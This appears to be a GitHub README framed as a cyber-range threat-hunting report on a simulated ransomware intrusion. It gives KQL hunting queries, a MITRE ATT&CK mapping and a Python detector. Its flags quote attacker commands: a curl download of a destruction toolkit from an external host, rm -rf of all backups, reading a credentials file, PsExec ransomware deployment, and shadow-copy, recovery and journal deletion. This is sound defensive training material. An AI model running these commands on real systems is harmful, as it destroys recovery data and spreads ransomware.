nadeznamorris/Threat-Hunting-Scenario-Dead-In-The-Water
GitHub: nadeznamorris/Threat-Hunting-Scenario-Dead-In-The-Water
A hands-on threat-hunting scenario built around a ransomware intrusion, providing stage-by-stage KQL detection queries and forensic analysis exercises.
Stars: 0 | Forks: 0
# Threat Hunting Scenario: Dead In The Water (The Azuki Breach)
## RDP Breach Incident
**Report ID:** INC-2026-0301
**Analyst:** Nadezna Morris
**Date:** 3 January 2026
**Incident Date:** 27 November 2025
## Executive Summary
One week after the initial compromise, the threat actor returned to finish what they had started. Using credentials obtained early in the intrusion, the attacker moved directly from the foothold at `10.1.0.108` into the organisation's Linux backup server (`10.1.0.189`) through the `backup-admin` account. They then enumerated every backup repository, harvested a plaintext credential file, downloaded an external destruction toolkit, and permanently deleted every backup archive in the environment. With recovery options eliminated, the attacker pivoted to the Windows estate using the stolen domain credential (`kenji.sato`) and `PsExec64.exe`, pushing the **SilentLynx** ransomware (`silentlynx.exe`) to further hosts, including `10.1.0.204`.
Before encrypting, the ransomware methodically disabled every native Windows recovery mechanism (volume shadow copies, the backup catalog, system recovery and the USN journal) and then dropped the `SILENTLYNX_README.txt` ransom note on the infected systems. The combined effect of the backup wipe and the ransomware deployment leaves the organisation with effectively no internal recovery path; restoration will depend entirely on offline/off-site copies, if any exist.
## 1. Investigation Findings
### Key Indicators of Compromise (IOCs):
| Indicator | Description |
| -------------------------------------------------| ---------------------------------------------------------|
| 10.1.0.108 | Source of the SSH pivot into the backup infrastructure |
| 10.1.0.189 | Compromised backup server |
| 10.1.0.204 | Target of the PsExec ransomware deployment |
| backup-admin | Privileged account used to access the backup server |
| kenji.sato | Stolen credential used for lateral movement |
| https://litter.catbox.moe/io523y.7z (destroy.7z) | Externally staged destruction toolkit |
| PsExec64.exe | Used to push the payload to C:\Windows\Temp\cache\ |
| silentlynx.exe | Ransomware payload deployed and executed on target hosts |
| WindowsSecurityHealth | Run key disguised as a legitimate Windows service |
| Microsoft\Windows\Security\SecurityHealthService | Disguised as a built-in security task |
| SILENTLYNX_README.txt | Ransom note dropped on encrypted systems |
| /backups/configs/all-credentials.txt | Plaintext credential store on the backup server |
### Stage 1: LINUX BACKUP SERVER COMPROMISE
***FLAG 1: Lateral Movement - Remote Access***
**Objective:** The attacker pivoted to critical infrastructure to eliminate recovery options before deploying the ransomware.
**Flag:** `"ssh.exe" backup-admin@10.1.0.189`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName has_any ("ssh.exe", "plink.exe")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 2: Lateral Movement - Attack Source***
**Objective:** Identifying the attack source enables network isolation and containment.
**Flag:** `10.1.0.108`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where LogonType in ("Network")
| where ActionType == "LogonSuccess"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 3: Credential Access - Compromised Account***
**Objective:** An administrative account with backup privileges provided access to critical recovery infrastructure.
**Flag:** `backup-admin`
```
DeviceLogonEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where LogonType in ("Network")
| where ActionType == "LogonSuccess"
| project TimeGenerated, DeviceName, AccountName, ActionType, LogonType, RemoteIP
| order by TimeGenerated asc
```
***FLAG 4: Discovery - Directory Enumeration***
**Objective:** File-system enumeration revealed backup locations and valuable destruction targets.
**Flag:** `ls --color=auto -la /backups/`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("dir", "ls")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 5: Discovery - File Search***
**Objective:** The attacker searched for specific file types to identify high-value targets.
**Flag:** `find /backups -name *.tar.gz`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("*.bak", "*.zip", "*.7z", "*.tar", "*.gz")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 6: Discovery - Account Enumeration***
**Objective:** The attacker enumerated local accounts to understand the system's user base.
**Flag:** `cat /etc/passwd`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("net user", "wmic useraccount", "Get-LocalUser", "/etc/passwd", "getent passwd")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated desc
```
***FLAG 7: Discovery - Scheduled Task Reconnaissance***
**Objective:** Knowing the backup schedule lets the attacker time the destruction for maximum impact.
**Flag:** `cat /etc/crontab`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("cat", "schtasks", "crontab", "/etc/cron")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 8: Command and Control - Tool Transfer***
**Objective:** The attacker downloaded tooling from external infrastructure to carry out the attack.
**Flag:** `curl -L -o destroy.7z https://litter.catbox.moe/io523y.7z`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("http://", "https://")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
```
***FLAG 9: Credential Access - Credential Theft***
**Objective:** Backup servers often store sensitive configuration files that contain credentials.
**Flag:** `cat /backups/configs/all-credentials.txt`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("credentials")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 10: Impact - Data Destruction***
**Objective:** Destroying the backups eliminates recovery options and maximises the ransomware's impact.
**Flag:** `rm -rf /backups/archives /backups/azuki-adminpc /backups/azuki-fileserver /backups/azuki-logisticspc /backups/config-backups /backups/configs /backups/daily /backups/database-backups /backups/databases /backups/fileserver /backups/logs /backups/monthly /backups/weekly /backups/workstations`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("del ", "rmdir ", "Remove-Item", "rm -rf", "vssadmin", "wbadmin")
| project TimeGenerated, FileName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 11: Impact - Service Stop***
**Objective:** Stopping a service takes effect immediately but does not survive a reboot.
**Flag:** `systemctl stop cron`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("net stop", "sc stop", "Stop-Service", "systemctl stop")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 12: Impact - Service Disable***
**Objective:** Disabling a service prevents it from starting at boot, so the effect persists across a reboot.
**Flag:** `systemctl disable cron`
```
DeviceProcessEvents
| where DeviceName == "azuki-backupsrv.zi5bvzlx0idetcyt0okhu05hda.cx.internal.cloudapp.net"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("sc config", "Set-Service", "systemctl disable", "chkconfig")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
### Stage 2: WINDOWS RANSOMWARE DEPLOYMENT
***FLAG 13: Lateral Movement - Remote Execution***
**Objective:** Remote administration tools let the attacker deploy malware to multiple systems at once.
**Flag:** `PsExec64.exe`
```
DeviceProcessEvents
| where DeviceName has_any ("azuki")
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName startswith "pse"
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 14: Lateral Movement - Deployment Command***
**Objective:** The full command line reveals the target system, the credential and the deployed payload.
**Flag:** `"PsExec64.exe" \\10.1.0.204 -u kenji.sato -p ********** -c -f C:\Windows\Temp\cache\silentlynx.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName startswith "pse"
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
***FLAG 15: Execution - Malicious Payload***
**Objective:** Identifying the payload enables threat hunting across the whole environment.
**Flag:** `silentlynx.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName has "PsExec64.exe"
| project TimeGenerated, DeviceName, AccountName, ProcessCommandLine
| order by TimeGenerated asc
```
### Stage 3: INHIBITING RECOVERY
***FLAG 16: Impact - Shadow Copy Service Stop***
**Objective:** The ransomware stops backup services to prevent recovery during encryption.
**Flag:** `"net" stop VSS /y`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("vss")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine, AccountName
| order by TimeGenerated asc
```
***FLAG 17: Impact - Backup Engine Stop***
**Objective:** Stopping the backup engine prevents backup operations while the attack is under way.
**Flag:** `"net" stop wbengine /y`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("net stop", "sc stop", "Stop-Service", "backup", "engine", "veeam", "wbengine", "exec")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 18: Defense Evasion - Process Termination***
**Objective:** Some processes hold locks on files and must be terminated before encryption can succeed.
**Flag:** `"taskkill" /F /IM sqlservr.exe`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("taskkill", "Stop-Service", "Stop-Process", "wmic process", "kill", "pkill")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 19: Impact - Recovery Point Deletion***
**Objective:** Recovery points allow rapid file restoration without external backups.
**Flag:** `"vssadmin" delete shadows /all /quiet`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("vssadmin", "shadowcopy", "diskshadow", "wbadmin delete")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated asc
```
***FLAG 20: Impact - Storage Limitation***
**Objective:** Capping shadow storage prevents new recovery points from being created.
**Flag:** `"vssadmin" resize shadowstorage /for=C: /on=C: /maxsize=401MB`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("vssadmin", "shadowcopy", "resize")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated desc
```
***FLAG 21: Impact - Recovery Disabled***
**Objective:** Windows Recovery supports automatic system repair after corruption.
**Flag:** `"bcdedit" /set {default} recoveryenabled No`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("bcdedit", "reagentc", "recoveryenabled", "disable")
| where ProcessCommandLine !has "msedgewebview2"
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated desc
```
***FLAG 22: Impact - Catalog Deletion***
**Objective:** The backup catalog tracks the available restore points and backup versions.
**Flag:** `"wbadmin" delete catalog -quiet`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("wbadmin", "delete")
| project TimeGenerated, DeviceName, FileName, ProcessCommandLine
| sort by TimeGenerated desc
```
### Stage 4: PERSISTENCE
***FLAG 23: Persistence - Registry Autorun***
**Objective:** Registry Run keys can execute programs automatically at system startup.
**Flag:** `WindowsSecurityHealth`
```
DeviceRegistryEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where RegistryKey has @"CurrentVersion\Run"
| where ActionType in ("RegistryValueSet", "RegistryValueModified")
| project TimeGenerated, DeviceName, RegistryKey, RegistryValueName, RegistryValueData
| order by TimeGenerated desc
```
***FLAG 24: Persistence - Scheduled Execution***
**Objective:** Scheduled tasks provide reliable persistence with configurable triggers.
**Flag:** `Microsoft\Windows\Security\SecurityHealthService`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has "schtasks"
| where ProcessCommandLine has "/create"
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
### Stage 5: ANTI-FORENSICS
***FLAG 25: Defense Evasion - Journal Deletion***
**Objective:** File-system journals record changes and are valuable to forensic analysis.
**Flag:** `"fsutil.exe" usn deletejournal /D C:`
```
DeviceProcessEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where ProcessCommandLine has_any ("deletejournal")
| project TimeGenerated, DeviceName, ProcessCommandLine
| order by TimeGenerated asc
```
### Stage 6: RANSOMWARE SUCCESS
***FLAG 26: Impact - Ransom Note***
**Objective:** The ransom note conveys the payment instructions and indicates that encryption succeeded.
**Flag:** `SILENTLYNX_README.txt`
```
DeviceFileEvents
| where DeviceName == "azuki-adminpc"
| where TimeGenerated between (datetime(2025-11-20) .. datetime(2025-12-19))
| where FileName has_any (".txt")
| project TimeGenerated, DeviceName, FileName, InitiatingProcessCommandLine
| order by TimeGenerated asc
```
## 2. Investigation Summary
The attack chain began with an SSH connection from `10.1.0.108` to `backup-admin@10.1.0.189`, which gave the attacker a foothold on the organisation's core Linux backup server. From there they carried out methodical reconnaissance: listing `/backups/`, searching for `*.tar.gz` archives, reading `/etc/passwd` for local accounts, and reading `/etc/crontab` to learn the backup schedule and time the destruction for maximum impact. They then pulled an external archive (`destroy.7z`) from a public file-sharing host and used it to support the destruction phase. A plaintext credential file (`/backups/configs/all-credentials.txt`) was harvested and almost certainly supplied the `kenji.sato` credential used later for Windows lateral movement. The attacker then ran a sweeping `rm -rf` across every backup directory (archives, daily/weekly/monthly sets, database backups, and the per-host workstation/server backups), destroying every recovery point. To make the destruction survive a reboot, they both stopped (`systemctl stop cron`) and disabled (`systemctl disable cron`) the cron service responsible for the ongoing backup jobs.
With the Linux backup infrastructure eliminated, the attacker pivoted to the Windows environment using `PsExec64.exe` and the `kenji.sato` credential, remotely executing `silentlynx.exe` from the staging path `C:\Windows\Temp\cache\` on `10.1.0.204` (and potentially other hosts). On execution, SilentLynx performed a textbook pre-encryption recovery wipe: it stopped the Volume Shadow Copy (`VSS`) and Windows Backup Engine (`wbengine`) services, killed `sqlservr.exe` to release locked database files, deleted all existing shadow copies and capped shadow storage at 401MB so no new ones could be created, disabled Windows automatic recovery via `bcdedit`, and purged the Windows Server Backup catalog via `wbadmin`. As a final anti-forensic step it wiped the NTFS USN change journal with `fsutil`, removing a key source of file-activity history for investigators. The malware established persistence through a registry Run key (`WindowsSecurityHealth`) and a scheduled task (`Microsoft\Windows\Security\SecurityHealthService`), both disguised as legitimate Windows security components, then completed encryption and dropped the `SILENTLYNX_README.txt` ransom note.
## 3. MITRE ATT&CK Mapping
| Tactic | Technique | Evidence |
| ------------------------------------------ | ------------------------------------------------------------ | ----------------------------------------------- |
| Lateral Movement | T1021.004 – Remote Services: SSH | SSH from 10.1.0.108 to backup-admin@10.1.0.189 |
| Persistence / Initial Access | T1078 – Valid Accounts | Use of the backup-admin and kenji.sato credentials |
| Discovery | T1083 – File and Directory Discovery | ls /backups/, find /backups -name *.tar.gz |
| Discovery | T1087.001 – Account Discovery: Local Account | cat /etc/passwd |
| Discovery | T1053.003 – Scheduled Task/Job: Cron | cat /etc/crontab |
| Command and Control / Resource Development | T1105 – Ingress Tool Transfer | curl download of destroy.7z |
| Credential Access | T1552.001 – Unsecured Credentials: Credentials In Files | cat /backups/configs/all-credentials.txt |
| Impact | T1485 – Data Destruction | rm -rf of every backup directory |
| Impact | T1489 – Service Stop | systemctl stop cron, net stop VSS/wbengine, taskkill sqlservr.exe |
| Impact | T1490 – Inhibit System Recovery | systemctl disable cron, vssadmin delete shadows/resize shadowstorage, bcdedit recoveryenabled No, wbadmin delete catalog |
| Lateral Movement | T1570 / T1021.002 – Lateral Tool Transfer / SMB Admin Shares | PsExec64.exe to 10.1.0.204 |
| Impact | T1486 – Data Encrypted for Impact | silentlynx.exe execution, SILENTLYNX_README.txt |
| Defense Evasion | T1070.004 – Indicator Removal: File Deletion | fsutil usn deletejournal /D C: |
| Persistence | T1547.001 – Registry Run Keys / Startup Folder | WindowsSecurityHealth registry key |
| Persistence | T1053.005 – Scheduled Task | Microsoft\Windows\Security\SecurityHealthService |
## 4. Recommendations
### Immediate Actions
- Isolate `10.1.0.108`, `10.1.0.189` and `10.1.0.204` from the network to stop further lateral movement and destruction.
- Immediately disable/rotate the `backup-admin` and `kenji.sato` credentials; both are confirmed compromised.
- Block outbound traffic to `litter.catbox.moe` and similar file-sharing/paste sites to cut off further tool downloads.
- Sweep every endpoint in the environment for `silentlynx.exe`, `PsExec64.exe`, the `WindowsSecurityHealth` registry key and the `Microsoft\Windows\Security\SecurityHealthService` scheduled task.
- Identify and inventory any surviving backups (offline, off-site, cloud) before taking further remediation steps that might overwrite them.
### Short-Term Remediation
- Rotate every credential in the environment, not only the accounts confirmed compromised.
- Remove the identified persistence mechanisms (registry key, scheduled task) from every affected host.
- Restrict SSH access to the backup server to a small allow-list/bastion host and permit key-based authentication only.
- Deploy or tune EDR alerting for recovery-inhibition commands: `vssadmin delete shadows`, `vssadmin resize shadowstorage`, `wbadmin delete catalog`, `bcdedit recoveryenabled No`, `net stop VSS/wbengine`.
- Rebuild the encrypted hosts from clean images and restore data from any surviving offline/off-site backups.
- Remove plaintext credential files (e.g. `all-credentials.txt`) from the backup infrastructure.
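The EDR alerting recommended above, and the recovery-inhibition and backup-destruction hunts of Stage 1 (flags 10-12), Stage 3 (flags 16-22) and Stage 5 (flag 25), expressed as one detection routine rather than a per-flag query. This is an added example, not code from the original report: it matches each process event's command line against the report's indicators and alerts on a host only when several distinct techniques land inside a short window, so a lone maintenance command stays quiet. The indicator labels, window size, threshold, timestamps and the sample telemetry are constructed assumptions; the command lines themselves are the report's flags (the `rm` list shortened).

```python
from __future__ import annotations

import re
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

# Indicators taken from the report's flags with the ATT&CK IDs from its mapping
# table; the short labels are this example's own naming. Patterns run against
# a lower-cased command line with the quotes MDE records around the image stripped.
INDICATORS = [
    ("backup_rm",      "T1485",     r"\brm\s+-\w*r\w*\s+.*/backups/"),
    ("cron_stop",      "T1489",     r"\bsystemctl\s+stop\s+cron\b"),
    ("cron_disable",   "T1490",     r"\bsystemctl\s+disable\s+cron\b"),
    ("vss_stop",       "T1489",     r"\bnet\s+stop\s+vss\b"),
    ("wbengine_stop",  "T1489",     r"\bnet\s+stop\s+wbengine\b"),
    ("db_kill",        "T1489",     r"\btaskkill\b.*\bsqlservr\.exe"),
    ("shadow_delete",  "T1490",     r"\bvssadmin\s+delete\s+shadows\b"),
    ("shadow_resize",  "T1490",     r"\bvssadmin\s+resize\s+shadowstorage\b"),
    ("recovery_off",   "T1490",     r"\bbcdedit\b.*\brecoveryenabled\s+no\b"),
    ("catalog_delete", "T1490",     r"\bwbadmin\s+delete\s+catalog\b"),
    ("usn_delete",     "T1070.004", r"\bfsutil(?:\.exe)?\s+usn\s+deletejournal\b"),
]
_COMPILED = [(label, tech, re.compile(rx)) for label, tech, rx in INDICATORS]


@dataclass(frozen=True)
class ProcessEvent:
    """One DeviceProcessEvents row, reduced to the columns the hunts project."""
    time: datetime
    device: str
    account: str
    command_line: str


@dataclass(frozen=True)
class Alert:
    device: str
    first_seen: datetime
    last_seen: datetime
    labels: tuple[str, ...]      # distinct indicator labels inside the window
    techniques: tuple[str, ...]  # distinct ATT&CK IDs those labels map to


def classify(cmd: str) -> list[tuple[str, str]]:
    """Return every (label, technique) whose pattern matches the command line."""
    text = " ".join(cmd.replace('"', "").split()).lower()
    return [(label, tech) for label, tech, rx in _COMPILED if rx.search(text)]


def detect(events, window=timedelta(minutes=15), min_distinct=3) -> list[Alert]:
    """One alert per device whose densest sliding window holds at least
    min_distinct distinct indicators; devices below the threshold are skipped."""
    hits = defaultdict(list)
    for ev in events:
        for label, tech in classify(ev.command_line):
            hits[ev.device].append((ev.time, label, tech))
    alerts = []
    for device, rows in hits.items():
        rows.sort()
        best = None
        for i, (start, _, _) in enumerate(rows):
            in_win = [r for r in rows[i:] if r[0] - start <= window]
            labels = {r[1] for r in in_win}
            if len(labels) >= min_distinct and (best is None or len(labels) > len(best[1])):
                best = (in_win, labels)
        if best is not None:
            in_win, labels = best
            alerts.append(Alert(device, in_win[0][0], in_win[-1][0],
                                tuple(sorted(labels)),
                                tuple(sorted({r[2] for r in in_win}))))
    return sorted(alerts, key=lambda a: a.first_seen)


def at(hour: int, minute: int) -> datetime:
    return datetime(2025, 11, 27, hour, minute)  # the report's incident date


# Constructed sample telemetry: the command lines are the report's flags, the
# times and the benign fileserver rows are assumptions of this example.
SAMPLE_EVENTS = [
    ProcessEvent(at(14, 9), "azuki-backupsrv", "backup-admin", "rm -rf /backups/archives /backups/daily /backups/weekly /backups/monthly"),
    ProcessEvent(at(14, 10), "azuki-backupsrv", "backup-admin", "systemctl stop cron"),
    ProcessEvent(at(14, 10), "azuki-backupsrv", "backup-admin", "systemctl disable cron"),
    ProcessEvent(at(15, 30), "azuki-adminpc", "kenji.sato", '"net" stop VSS /y'),
    ProcessEvent(at(15, 30), "azuki-adminpc", "kenji.sato", '"net" stop wbengine /y'),
    ProcessEvent(at(15, 31), "azuki-adminpc", "kenji.sato", '"taskkill" /F /IM sqlservr.exe'),
    ProcessEvent(at(15, 31), "azuki-adminpc", "kenji.sato", '"vssadmin" delete shadows /all /quiet'),
    ProcessEvent(at(15, 31), "azuki-adminpc", "kenji.sato", '"vssadmin" resize shadowstorage /for=C: /on=C: /maxsize=401MB'),
    ProcessEvent(at(15, 32), "azuki-adminpc", "kenji.sato", '"bcdedit" /set {default} recoveryenabled No'),
    ProcessEvent(at(15, 32), "azuki-adminpc", "kenji.sato", '"wbadmin" delete catalog -quiet'),
    ProcessEvent(at(15, 33), "azuki-adminpc", "kenji.sato", '"fsutil.exe" usn deletejournal /D C:'),
    # routine backup maintenance on another host: one lone hit, no alert
    ProcessEvent(at(9, 0), "azuki-fileserver", "it-admin", "vssadmin list shadows"),
    ProcessEvent(at(9, 5), "azuki-fileserver", "it-admin", '"wbadmin" delete catalog -quiet'),
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Run against the sample it raises two alerts, one per compromised host, and none for the fileserver's single catalog deletion.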
### Long-Term Remediation
- Implement a 3-2-1 backup strategy with immutable, air-gapped or offline copies that a production-network compromise cannot reach.
- Segment the backup infrastructure into its own restricted network zone, separate from the regular workstation/server VLANs.
- Deploy a privileged access management (PAM) and secrets-vault solution to eliminate stored plaintext credentials.
- Enforce MFA on all privileged and administrative accounts.
- Establish continuous threat hunting / SOC monitoring for lateral-movement tooling (PsExec, remote service creation) and anti-forensic activity (USN journal deletion).
- Run regular IR tabletop exercises covering ransomware plus backup-destruction scenarios.
**Report Status:** Completed
**Next Review:** 10 January 2026
**Distribution:** Cyber Range